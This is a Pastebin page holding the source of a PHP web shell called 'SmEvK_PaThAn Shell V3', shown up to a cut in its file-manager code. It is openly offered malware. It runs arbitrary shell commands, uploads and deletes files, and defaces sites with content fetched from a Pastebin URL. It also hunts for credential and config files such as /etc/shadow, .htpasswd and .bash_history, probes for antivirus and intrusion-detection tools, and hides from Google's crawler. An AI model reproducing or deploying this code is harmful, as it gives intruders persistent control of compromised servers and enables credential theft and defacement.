API tools faq
paste
Guest User

Untitled

a guest
Jun 2nd, 2018
316
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 74.60 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3.  
  4. 1337 H3r3.. <3
  5. Edit Shell according to your choice.
  6. Domain read bypass.
  7. Enjoy!
  8.  
  9. */
  10. //Make your setting here.
  11. $deface_url = 'http://pastebin.com/raw.php?i=FHfxsFGT'; //deface url here(pastebin).
  12. $UserName = "1337"; //Your UserName here.
  13. $auth_pass = "1337"; //Your Password.
  14. //Change Shell Theme here//
  15. $color = "#ABEFFF"; //Fonts color modify here.
  16. $Theme = '#09B5A6'; //Change border-color accoriding to your choice.
  17. $TabsColor = '#0E5061'; //Change tabs color here.
  18. #-------------------------------------------------------------------------------
  19.  
  20. ?>
  21. <?php
  22.  
  23. $default_action = 'FilesMan';
  24. @define('SELF_PATH', __FILE__);
  25. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  26. header('HTTP/1.0 404 Not Found');
  27. exit;
  28. }
  29.  
  30. @session_start();
  31. @error_reporting(0);
  32. @ini_set('error_log',NULL);
  33. @ini_set('display_errors',0);
  34. @ini_set('log_errors',0);
  35. @ini_set('max_execution_time',0);
  36. @set_time_limit(0);
  37. @set_magic_quotes_runtime(0);
  38. if( get_magic_quotes_gpc() ) {
  39. function stripslashes_array($array) {
  40. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  41. }
  42. $_POST = stripslashes_array($_POST);
  43. }
  44.  
  45. function printLogin() {
  46. if ($_POST['pass'] != $auth_pass && $_POST['uname'] != $UserName) {
  47. $status = 'Wrong Password or UserName :(';
  48.  
  49.  
  50. }
  51.  
  52. ?>
  53.  
  54. <html>
  55. <head>
  56. <title>SmEvK v3</title>
  57. <link href="https://fonts.googleapis.com/css?family=Josefin+Sans:400,100" rel="stylesheet">
  58. </head>
  59. <style>
  60. body{
  61. font-family: Josefin Sans, sans-serif;
  62. background: black;
  63. color:#ABEFFF;
  64. }
  65. .loginpage img{
  66. width: 500px;
  67. height: 150px;
  68. }
  69. .loginpage{
  70. height: 400px;
  71. width: 500px;
  72. border:1px solid;
  73. border-color:#ABEFFF;
  74. text-align: center;
  75. border-radius: 5px;
  76. margin-top: 100px;
  77. }
  78. #pageheading{
  79. font-size:25px;
  80. color:#ABEFFF;
  81. margin-top: 10px;
  82. }
  83. .loginpage img{
  84. width: 500px;
  85.  
  86. }
  87. input{
  88. background: black;
  89. border-color:#ABEFFF;
  90. border-radius: 10px;
  91. margin-top: 10px;
  92. padding:5px;
  93. color: #ABEFFF;
  94. }
  95. input:hover{
  96. background: #ABEFFF;
  97. color: red;
  98.  
  99. }
  100.  
  101. </style>
  102. <body>
  103. <center>
  104. <div class="loginpage">
  105. <img src="http://i63.tinypic.com/1108vic.jpg" alt="Smevk Logo">
  106. <div id="pageheading">SmEvK_PaThAn Shell V3</div>
  107. <form method="post">
  108. User Name: <input type="text" name="uname" ><br>
  109. Password : <input type="password" name="pass" ><br>
  110. <input type="submit" name="login" value="Login">
  111. <?php
  112.  
  113. if (isset($status)) {
  114. ?>
  115.  
  116.  
  117.  
  118.  
  119. </form>
  120.  
  121. </d<p><?=$status?></p>
  122. </center>
  123. </body>
  124. </html>
  125.  
  126. <?php
  127.  
  128.  
  129. }
  130. exit;
  131. }
  132.  
  133. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  134. if( empty( $auth_pass ) ||
  135. ( isset( $_POST['pass'] ) && ($_POST['pass']) == $auth_pass && ($_POST['uname']) == $UserName))
  136. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  137.  
  138. else
  139.  
  140. printLogin();
  141.  
  142. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  143. $os = 'win';
  144. else
  145. $os = 'nix';
  146. $safe_mode = @ini_get('safe_mode');
  147. $disable_functions = @ini_get('disable_functions');
  148. $home_cwd = @getcwd();
  149. if( isset( $_POST['c'] ) )
  150. @chdir($_POST['c']);
  151. $cwd = @getcwd();
  152. if( $os == 'win') {
  153. $home_cwd = str_replace("\\", "/", $home_cwd);
  154. $cwd = str_replace("\\", "/", $cwd);
  155. }
  156. if( $cwd[strlen($cwd)-1] != '/' )
  157. $cwd .= '/';
  158.  
  159. if($os == 'win') {
  160. $aliases = array(
  161. "List Directory" => "dir",
  162. "Find index.php in current dir" => "dir /s /w /b index.php",
  163. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  164. "Show active connections" => "netstat -an",
  165. "Show running services" => "net start",
  166. "User accounts" => "net user",
  167. "Show computers" => "net view",
  168. "ARP Table" => "arp -a",
  169. "IP Configuration" => "ipconfig /all"
  170. );
  171. } else {
  172. $aliases = array(
  173. "List dir" => "ls -la",
  174. "list file attributes on a Linux second extended file system" => "lsattr -va",
  175. "show opened ports" => "netstat -an | grep -i listen",
  176. "Find" => "",
  177. "find all suid files" => "find / -type f -perm -04000 -ls",
  178. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  179. "find all sgid files" => "find / -type f -perm -02000 -ls",
  180. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  181. "find config.inc.php files" => "find / -type f -name config.inc.php",
  182. "find config* files" => "find / -type f -name \"config*\"",
  183. "find config* files in current dir" => "find . -type f -name \"config*\"",
  184. "find all writable folders and files" => "find / -perm -2 -ls",
  185. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  186. "find all service.pwd files" => "find / -type f -name service.pwd",
  187. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  188. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  189. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  190. "find all .bash_history files" => "find / -type f -name .bash_history",
  191. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  192. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  193. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  194. "Locate" => "",
  195. "locate httpd.conf files" => "locate httpd.conf",
  196. "locate vhosts.conf files" => "locate vhosts.conf",
  197. "locate proftpd.conf files" => "locate proftpd.conf",
  198. "locate psybnc.conf files" => "locate psybnc.conf",
  199. "locate my.conf files" => "locate my.conf",
  200. "locate admin.php files" =>"locate admin.php",
  201. "locate cfg.php files" => "locate cfg.php",
  202. "locate conf.php files" => "locate conf.php",
  203. "locate config.dat files" => "locate config.dat",
  204. "locate config.php files" => "locate config.php",
  205. "locate config.inc files" => "locate config.inc",
  206. "locate config.inc.php" => "locate config.inc.php",
  207. "locate config.default.php files" => "locate config.default.php",
  208. "locate config* files " => "locate config",
  209. "locate .conf files"=>"locate '.conf'",
  210. "locate .pwd files" => "locate '.pwd'",
  211. "locate .sql files" => "locate '.sql'",
  212. "locate .htpasswd files" => "locate '.htpasswd'",
  213. "locate .bash_history files" => "locate '.bash_history'",
  214. "locate .mysql_history files" => "locate '.mysql_history'",
  215. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  216. "locate backup files" => "locate backup",
  217. "locate dump files" => "locate dump",
  218. "locate priv files" => "locate priv"
  219. );
  220. }
  221. if(isset($_POST['p1']) && $_POST['p1']=='deface') {
  222.  
  223. $def = file_get_contents($deface_url);
  224. file_put_contents($_POST['c'].$_POST['p2'],$def);
  225. }
  226. function ex($in) {
  227. $out = '';
  228. if(function_exists('exec')) {
  229. @exec($in,$out);
  230. $out = @join("\n",$out);
  231. }elseif(function_exists('passthru')) {
  232. ob_start();
  233. @passthru($in);
  234. $out = ob_get_clean();
  235. }elseif(function_exists('system')) {
  236. ob_start();
  237. @system($in);
  238. $out = ob_get_clean();
  239. }elseif(function_exists('shell_exec')) {
  240. $out = shell_exec($in);
  241. }elseif(is_resource($f = @popen($in,"r"))) {
  242. $out = "";
  243. while(!@feof($f))
  244. $out .= fread($f,1024);
  245. pclose($f);
  246. }
  247. return $out;
  248. }
  249.  
  250. function which($p) {
  251. $path = ex('which '.$p);
  252. if(!empty($path))
  253. return $path;
  254. return false;
  255. }
  256.  
  257. function printHeader() {
  258. if(empty($_POST['charset']))
  259. $_POST['charset'] = "UTF-8";
  260. global $color;
  261. global $Theme;
  262. global $TabsColor;
  263. echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>";
  264. echo '<html>
  265. <meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>SmEvK v3</title>
  266. <style>
  267. body {background-color:black;color:#fff;}
  268. body,td,th { font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }
  269. span,h1,a { color:'.$color.' !important; }
  270. span { font-weight: bolder; }
  271. h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
  272. div.content { padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.$Theme.'; border-radius:5px;}
  273. a { text-decoration:none; }
  274. a:hover { border-bottom:0px solid #5e5e5e;text-decoration:none; }
  275. a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;text-decoration:none;}
  276. .ml1 { border:1px solid '.$Theme.';padding:px;margin:0;overflow: auto; }
  277. .bigarea { width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.$Theme.'; background:#2F2F2F;}
  278. input, textarea, select { margin-top:0;color:#63E1FF;background-color:black;border-radius:5px;border:1px solid '.$Theme.'; border-radis:5px;font: 10pt arial,"Courier New"; }
  279. input[type="button"]:hover,input[type="submit"]:hover {background-color:#094F60;color:black;text-decoration:none;}
  280. form { margin:0px; background:#0F1010;}
  281. #toolsTbl { text-align:center; }
  282. .toolsInp { width: 80%; background:black; border-radius:5px; border-color:'.$Theme.'; }
  283. .main th {text-align:left;background-color:'.$TabsColor.';}
  284. .main tr:hover{background:'.$Theme.'; border:5px solid;border-color:'.$Theme.';}
  285. .main td, th{vertical-align:middle;}
  286. .menu { height:30px; border-radius:10px;}
  287. .menu th{padding:1px;border-radius: 5px; background:'.$TabsColor.'; -webkit-transform: rotate(20deg);
  288. -moz-transform: rotate(20deg);
  289. -o-transform: rotate(20deg);
  290. -ms-transform: rotate(20deg);
  291. transform: rotate(20deg);}
  292. .menu th:hover{background:#0F1010;text-decoration: none;}
  293. pre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}
  294. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  295.  
  296.  
  297. .cpr {margin-bottom:5px;font-weight:bold; }
  298. .cpb {width:34px;margin:0 5px;}
  299.  
  300. .npoad td {padding:0;}
  301. #Smevktools{
  302. margin-top:50px;
  303. width:500px;
  304. border:1px solid;
  305. border-radius:10px;
  306. }
  307. .smevklogo td{
  308. font-size:12px;
  309. font-weight:bold;
  310.  
  311.  
  312.  
  313. }
  314. .smevklogo{
  315. margin-left:5px;
  316. background:url(http://i63.tinypic.com/1108vic.jpg);
  317. background-repeat: no-repeat;
  318. background-position: CENTER;
  319. background-color:#0F1010;
  320. background-size: 400px 120px;
  321.  
  322.  
  323.  
  324. }
  325. </style>
  326.  
  327. </html>
  328. <style type="text/css">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
  329. <script>
  330. function set(a,c,p1,p2,p3,charset) {
  331. if(a != null)document.mf.a.value=a;
  332. if(c != null)document.mf.c.value=c;
  333. if(p1 != null)document.mf.p1.value=p1;
  334. if(p2 != null)document.mf.p2.value=p2;
  335. if(p3 != null)document.mf.p3.value=p3;
  336. if(charset != null)document.mf.charset.value=charset;
  337. }
  338. function g(a,c,p1,p2,p3,charset) {
  339. set(a,c,p1,p2,p3,charset);
  340. document.mf.submit();
  341. }
  342. function a(a,c,p1,p2,p3,charset) {
  343. set(a,c,p1,p2,p3,charset);
  344. var params = "ajax=true";
  345. for(i=0;i<document.mf.elements.length;i++)
  346. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  347. sr("'.$_SERVER['REQUEST_URI'].'", params);
  348. }
  349. function sr(url, params) {
  350. if (window.XMLHttpRequest) {
  351. req = new XMLHttpRequest();
  352. req.onreadystatechange = processReqChange;
  353. req.open("POST", url, true);
  354. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  355. req.send(params);
  356. }
  357. else if (window.ActiveXObject) {
  358. req = new ActiveXObject("Microsoft.XMLHTTP");
  359. if (req) {
  360. req.onreadystatechange = processReqChange;
  361. req.open("POST", url, true);
  362. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  363. req.send(params);
  364. }
  365. }
  366. }
  367. function processReqChange() {
  368. if( (req.readyState == 4) )
  369. if(req.status == 200) {
  370. //alert(req.responseText);
  371. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  372. var arr=reg.exec(req.responseText);
  373. eval(arr[2].substr(0, arr[1]));
  374. }
  375. else alert("Request error!");
  376. }
  377. </script>
  378. <head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
  379. <form method=post name=mf style="display:none;">
  380. <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
  381. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  382. <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
  383. <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
  384. <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
  385. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  386. </form>';
  387. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  388. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  389. $totalSpace = $totalSpace?$totalSpace:1;
  390. $disable_functions = @ini_get('disable_functions');
  391. $release = @php_uname('r');
  392. $kernel = @php_uname('s');
  393. if(!function_exists('posix_getegid')) {
  394. $user = @get_current_user();
  395. $uid = @getmyuid();
  396. $gid = @getmygid();
  397. $group = "?";
  398. } else {
  399. $uid = @posix_getpwuid(@posix_geteuid());
  400. $gid = @posix_getgrgid(@posix_getegid());
  401. $user = $uid['name'];
  402. $uid = $uid['uid'];
  403. $group = $gid['name'];
  404. $gid = $gid['gid'];
  405. }
  406. $cwd_links = '';
  407. $path = explode("/", $GLOBALS['cwd']);
  408. $n=count($path);
  409. for($i=0;$i<$n-1;$i++) {
  410. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  411. for($j=0;$j<=$i;$j++)
  412. $cwd_links .= $path[$j].'/';
  413. $cwd_links .= "\")'>".$path[$i]."/</a>";
  414. }
  415. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  416. $opt_charsets = '';
  417. foreach($charsets as $item)
  418. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  419. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','String tools'=>'StringTools','Import Scripts'=>'ImportScripts','Network'=>'Network','Readable Dirs'=>'Readable','Defacer' => 'Deface','Code Injector'=>'Injector','Domains' => 'Domain');
  420. if(!empty($GLOBALS['auth_pass']))
  421. $m['Logout'] = 'Logout';
  422. $menu = '';
  423. foreach($m as $k => $v)
  424. $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
  425. $drives = "";
  426. if ($GLOBALS['os'] == 'win') {
  427. foreach( range('a','z') as $drive ){
  428. if (is_dir($drive.':\\'))
  429. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  430. }
  431. $drives .= '<br />: ';
  432. }
  433. if($GLOBALS['os'] == 'nix') {
  434. $dominios = @file_get_contents("/etc/named.conf");
  435. if(!$dominios) {
  436. $DomainS = "/var/named";
  437. $Domainonserver = scandir($DomainS);
  438. $d0c = count($Domainonserver);
  439. } else {
  440. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  441. $out = sizeof(array_unique($out[1]));
  442. $d0c = $out." Domains";
  443. }
  444. } else {
  445. $d0c = "Nothing here bro:(";
  446. }
  447. if($GLOBALS['os'] == 'nix' )
  448. {
  449. $usefl = ''; $dwnldr = '';
  450. if(!@ini_get('safe_mode')) {
  451. $temp = array();
  452. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  453. foreach($userful as $item) { if(which($item)) $temp[]= $item; }
  454. $usefl = implode(', ',$temp);
  455. $temp = array();
  456. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  457. foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
  458. $dwnldr = implode(', ',$temp);
  459. } else {
  460. $usefl = ' ------- '; $dwnldr = ' ------- ';
  461. }
  462. } else {
  463. $usefl = ' ------- '; $dwnldr = ' ------- ';
  464. }
  465. echo '<div class="smevklogo"><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr>
  466. <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
  467. <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
  468. '<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
  469. '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table></div>'.
  470. '</div></div><div style="margin:5;background:black;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:black;">';
  471. }
  472.  
  473. function printFooter() {
  474. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  475.  
  476. echo '</div><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
  477. <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
  478. <tr>
  479. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
  480. <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  481. </tr>
  482. <tr>
  483. <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
  484. <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  485. </tr>
  486. <tr>
  487. <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  488. <td><form method="post" ENCTYPE="multipart/form-data">
  489. <input type=hidden name=a value="FilesMAn">
  490. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  491. <input type=hidden name=p1 value="uploadFile">
  492. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  493. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  494. </tr>
  495. </table></div></div>
  496. <div style="margin:5px;background:black;"><div class="content" style="border:2px solid '.$Theme.';text-align:center;font-weight:bold; border-radius:10px;margin:auto; width:500;">SmEvK_PaThAn Shell v3 coded by <a href="https://www.facebook.com/smevkpathan"> Kashif Khan</a></div></div>
  497. </div>
  498. </body></html>';
  499. }
  500.  
  501. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  502. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  503.  
  504.  
  505. function viewSize($s) {
  506. if($s >= 1073741824)
  507. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  508. elseif($s >= 1048576)
  509. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  510. elseif($s >= 1024)
  511. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  512. else
  513. return $s . ' B';
  514. }
  515.  
  516. function perms($p) {
  517. if (($p & 0xC000) == 0xC000)$i = 's';
  518. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  519. elseif (($p & 0x8000) == 0x8000)$i = '-';
  520. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  521. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  522. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  523. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  524. else $i = 'u';
  525. $i .= (($p & 0x0100) ? 'r' : '-');
  526. $i .= (($p & 0x0080) ? 'w' : '-');
  527. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  528. $i .= (($p & 0x0020) ? 'r' : '-');
  529. $i .= (($p & 0x0010) ? 'w' : '-');
  530. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  531. $i .= (($p & 0x0004) ? 'r' : '-');
  532. $i .= (($p & 0x0002) ? 'w' : '-');
  533. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  534. return $i;
  535. }
  536.  
  537. function viewPermsColor($f) {
  538. if (!@is_readable($f))
  539. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  540. elseif (!@is_writable($f))
  541. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  542. else
  543. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  544. }
  545.  
  546. if(!function_exists("scandir")) {
  547. function scandir($dir) {
  548. $dh = opendir($dir);
  549. while (false !== ($filename = readdir($dh))) {
  550. $files[] = $filename;
  551. }
  552. return $files;
  553. }
  554. }
  555.  
  556. function actionSecInfo() {
  557. printHeader();
  558. echo '<h1>Server security information</h1><div class=content>';
  559. function showSecParam($n, $v) {
  560. $v = trim($v);
  561. if($v) {
  562. echo '<span>'.$n.': </span>';
  563. if(strpos($v, "\n") === false)
  564. echo $v.'<br>';
  565. else
  566. echo '<pre class=ml1>'.$v.'</pre>';
  567. }
  568. }
  569.  
  570. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  571. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  572. showSecParam('Open base dir', @ini_get('open_basedir'));
  573. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  574. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  575. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  576. $temp=array();
  577. if(function_exists('mysql_get_client_info'))
  578. $temp[] = "MySql (".mysql_get_client_info().")";
  579. if(function_exists('mssql_connect'))
  580. $temp[] = "MSSQL";
  581. if(function_exists('pg_connect'))
  582. $temp[] = "PostgreSQL";
  583. if(function_exists('oci_connect'))
  584. $temp[] = "Oracle";
  585. showSecParam('Supported databases', implode(', ', $temp));
  586. echo '<br>';
  587.  
  588. if( $GLOBALS['os'] == 'nix' ) {
  589. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  590. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  591. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  592. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  593. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  594. showSecParam('OS version', @file_get_contents('/proc/version'));
  595. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  596. if(!$GLOBALS['safe_mode']) {
  597. echo '<br>';
  598. $temp=array();
  599. foreach ($userful as $item)
  600. if(which($item)){$temp[]=$item;}
  601. showSecParam('Userful', implode(', ',$temp));
  602. $temp=array();
  603. foreach ($danger as $item)
  604. if(which($item)){$temp[]=$item;}
  605. showSecParam('Danger', implode(', ',$temp));
  606. $temp=array();
  607. foreach ($downloaders as $item)
  608. if(which($item)){$temp[]=$item;}
  609. showSecParam('Downloaders', implode(', ',$temp));
  610. echo '<br/>';
  611. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  612. showSecParam('HDD space', ex('df -h'));
  613. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  614. }
  615. } else {
  616. showSecParam('OS Version',ex('ver'));
  617. showSecParam('Account Settings',ex('net accounts'));
  618. showSecParam('User Accounts',ex('net user'));
  619. }
  620. echo '</div>';
  621. printFooter();
  622. }
  623.  
  624. function actionFilesMan() {
  625. printHeader();
  626. echo '<h1>File manager</h1><div class=content>';
  627. if(isset($_POST['p1']) && $_POST['p1']!='deface') {
  628. switch($_POST['p1']) {
  629. case 'uploadFile':
  630. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  631. echo "Can't upload file!";
  632. break;
  633. break;
  634. case 'mkdir':
  635. if(!@mkdir($_POST['p2']))
  636. echo "Can't create new dir";
  637. break;
  638. case 'delete':
  639. function deleteDir($path) {
  640. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  641. $dh = opendir($path);
  642. while ( ($item = readdir($dh) ) !== false) {
  643. $item = $path.$item;
  644. if ( (basename($item) == "..") || (basename($item) == ".") )
  645. continue;
  646. $type = filetype($item);
  647. if ($type == "dir")
  648. deleteDir($item);
  649. else
  650. @unlink($item);
  651. }
  652. closedir($dh);
  653. rmdir($path);
  654. }
  655. if(is_array(@$_POST['f']))
  656. foreach($_POST['f'] as $f) {
  657. $f = urldecode($f);
  658. if(is_dir($f))
  659. deleteDir($f);
  660. else
  661. @unlink($f);
  662. }
  663. break;
  664.  
  665.  
  666.  
  667.  
  668. case 'paste':
  669. if($_SESSION['act'] == 'copy') {
  670. function copy_paste($c,$s,$d){
  671. if(is_dir($c.$s)){
  672. mkdir($d.$s);
  673. $h = opendir($c.$s);
  674. while (($f = readdir($h)) !== false)
  675. if (($f != ".") and ($f != "..")) {
  676. copy_paste($c.$s.'/',$f, $d.$s.'/');
  677. }
  678. } elseif(is_file($c.$s)) {
  679. @copy($c.$s, $d.$s);
  680. }
  681. }
  682. foreach($_SESSION['f'] as $f)
  683. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  684. } elseif($_SESSION['act'] == 'move') {
  685. function move_paste($c,$s,$d){
  686. if(is_dir($c.$s)){
  687. mkdir($d.$s);
  688. $h = opendir($c.$s);
  689. while (($f = readdir($h)) !== false)
  690. if (($f != ".") and ($f != "..")) {
  691. copy_paste($c.$s.'/',$f, $d.$s.'/');
  692. }
  693. } elseif(is_file($c.$s)) {
  694. @copy($c.$s, $d.$s);
  695. }
  696. }
  697. foreach($_SESSION['f'] as $f)
